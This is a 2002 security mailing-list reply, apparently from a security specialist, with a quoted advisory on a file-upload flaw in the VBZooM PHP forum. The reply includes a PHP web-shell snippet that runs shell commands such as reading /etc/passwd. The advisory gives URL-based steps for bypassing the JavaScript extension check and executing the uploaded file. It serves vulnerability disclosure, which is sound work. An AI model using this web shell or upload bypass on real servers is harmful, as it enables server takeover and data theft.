A damage could be alot more than assessed by hish in his last email, and not just infecting the visitors of the forum, but a critical server risk. For instance if an attacker makes a perl/php script of malicious code, he could takeover the server with httpd-user id. An attacker could create file with similar code below, and will upload it with the extention .php ... <?php $cmd = "cat /etc/passwd"; // or $cmd = "cat ".dirname($_SERVER['PATH_TRANSLATED'])."/path.to.database.headers"; // or $cmd ="echo \"This is an example \">".dirname($_SERVER['PATH_TRANSLATED'])."/hacked"; $h = shell_exec($cmd); echo $h; ?> ...and then he will call the url from his browser to execute the script... http://host/forums/<attacker-file.php> the said $cmd will execute. Regards, -- M. Zeeshan Mustafa Software Security Specialist & Architect E: security@zeeshan.net C: +92(0)300-9249567 W: http://www.zeeshan.net On Wednesday 09 October 2002 09:21 pm, hish _ hish wrote: ::::: Name: VBZooM ::::: Version Affected: tested on v1.01 maybe other version vulnerable also ::::: Severity: Critical ::::: Category: upload system ::::: Vendor URL: http://www.vbzoom.com ::::: Author: hish_hish <hish_hish565@hotmail.com> ::::: Date: discloused on 28th Aug 2002 ::::: published at 8th oct 2002 ::::: ::::: Description ::::: *********** ::::: VBZooM is bulletin board system which written in php, ::::: the problem lay on file upload system, the script uses JavaScript to check ::::: for valid extinsions. ::::: and you can bypass this check in two ways (see Details). ::::: ::::: ::::: Details ::::: ******* ::::: there are two ways to bypass the JavaScript file extinsion check, ::::: ::::: 1st : ::::: you should be a member in the victim script, ::::: and go to make new subject, now save the page in your hard drive ::::: and remove the JavaScript code // at the last of the page ::::: and make some changes in <form action="add-subject.php ......> ::::: to <form action="http://victim/VBZoom/add-subject.php ....> ::::: now select your malicious file to upload it (should be .php) ::::: OK now hit submit bottom , the forum will redirect you to your subject ::::: douh :) your file waiting you as attachment :) ::::: NOTE : all visitor can see and use your uploaded file , so forget the 1st ::::: way and see 2nd: . ::::: ::::: 2nd: ::::: ::::: you dont need to be a member in victim forum , just follow me :) . ::::: http://www.victim.com/VBZooM/add-subject.php?Success=1 ::::: &FileName=SourceFile&FileName_size=500&FileName_name=DistFile ::::: it will upload your file in "/download" directory. ::::: now execute your .php file ::::: http://www.victim.com/VBZooM/download/DistFile :)) ::::: ::::: ::::: Fix Information ::::: *************** ::::: contact http://www.vbzoom.com ::::: ::::: :::::
